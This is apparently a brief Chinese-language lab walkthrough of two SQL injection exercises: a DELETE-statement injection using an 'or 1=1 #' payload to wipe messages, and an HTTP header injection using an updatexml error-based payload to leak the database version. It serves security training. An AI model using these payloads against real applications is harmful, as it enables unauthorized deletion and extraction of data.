一、delete注入
添加留言
添加 or 1=1 # 进行删除![](https://img-blog.csdnimg.cn/bf04071d2016412fa4248cd3526b4fae.png)
进行url编码
删除成功:![](https://img-blog.csdnimg.cn/7c813ee60a22400db84ce92bb9e65c00.png)
二、http header注入
使用 ' 判断哪里存在sql注入
测试,使用 ' ' 发现成功
使用order by 判段是否为select查询,如果不是则使用updatexml![](https://img-blog.csdnimg.cn/cbb5ac2c3b51439783027e47710a734a.png)
admin' or updatexml(2,concat(0x7e,(version())),0) or '
admin' or updatexml(2,concat(0x7e,(version())),0) or '